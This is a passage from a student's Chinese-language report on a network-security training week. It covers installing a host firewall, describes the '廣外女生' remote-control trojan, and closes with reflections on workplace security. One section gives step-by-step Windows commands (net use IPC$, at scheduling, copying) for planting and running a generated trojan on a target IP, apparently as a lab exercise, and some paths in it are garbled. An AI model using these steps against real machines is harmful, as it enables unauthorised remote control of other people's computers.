在“歡迎安裝愛思紅墻主機網(wǎng)絡防火墻”對話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對話框，接受協(xié)議點擊“是”；

第四步： 點擊“是”按鈕，出現(xiàn)顯示您計算機的相關(guān)信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標位置”對話框；

第六步： 在該對話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對話框中選擇盤符作為驅(qū)動器，再指定相應的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開始復制文件；

第九步： 進入“紅墻主機網(wǎng)絡防火墻配置”窗口，作出是否運行“紅墻應用程序掃描系統(tǒng)”的選擇后，點擊“完成”。

相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。

點擊主界面中的“規(guī)則管理”按鈕，彈出相應窗口，如下圖：

網(wǎng)絡監(jiān)控中心：

（5）網(wǎng)絡攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運行指定文件等功能；注冊表操作方面：全面模擬WINDOWS的注冊表編輯器，讓遠程注冊表編輯工作有如在本機上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來減少傳輸?shù)臅r間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對方的鼠標及鍵盤，就像操縱自己的計算機一樣；遠程任務管理方面，可以直觀地瀏覽對方窗體，隨意殺掉對方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務端設(shè)置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復制到自己的C盤中，再根據(jù)一些命令把“GDUFS.exe”復制到目標主機的盤中，再進行運行。目標主機的IP：191.168.12.38 具體步驟及命令：

“開始”——“運行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標主機之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標主機的時間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標主機的C盤建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復制“GDUFS.exe”文件到目標主機的C盤中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標主機中什么時候運行。

三、專周小結(jié)：

通過這次網(wǎng)絡安全專周，我不僅僅是學到了很多知識，更是透徹的理解到了網(wǎng)絡安全對生活已經(jīng)將來工作的意義。

網(wǎng)絡安全分為軟件網(wǎng)絡安全和硬件網(wǎng)絡安全。一般我們說的網(wǎng)絡安全就是軟件上的網(wǎng)絡安全，即局域網(wǎng)，互聯(lián)網(wǎng)安全。

網(wǎng)絡安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中，內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計，全國因為內(nèi)網(wǎng)安全的問題，至少每年算是幾億美元。所以，網(wǎng)絡安全特別重要。

至于在將來的工作中，我們也要嚴格尊市網(wǎng)絡設(shè)備管理原則和使用秩序，對設(shè)備進行統(tǒng)一管理專人負責，嚴格要求自己對設(shè)備進行安全操作，保持強烈的責任感和服務意識，做好每一個細節(jié)，重點做好以下幾項工作：

1，及時準確判斷網(wǎng)絡故障，做好上門維護工作或及時提醒網(wǎng)絡合作商進行維護。

2，定期檢查維護各網(wǎng)絡設(shè)備的運行情況并進行維護。3，不定期對服務器進行更新和檢查。

4，遇到特殊情況，及時向領(lǐng)導和老師匯報，努力提高應急處理問題和獨立處理問題的能力。

感謝老師對我們的教導。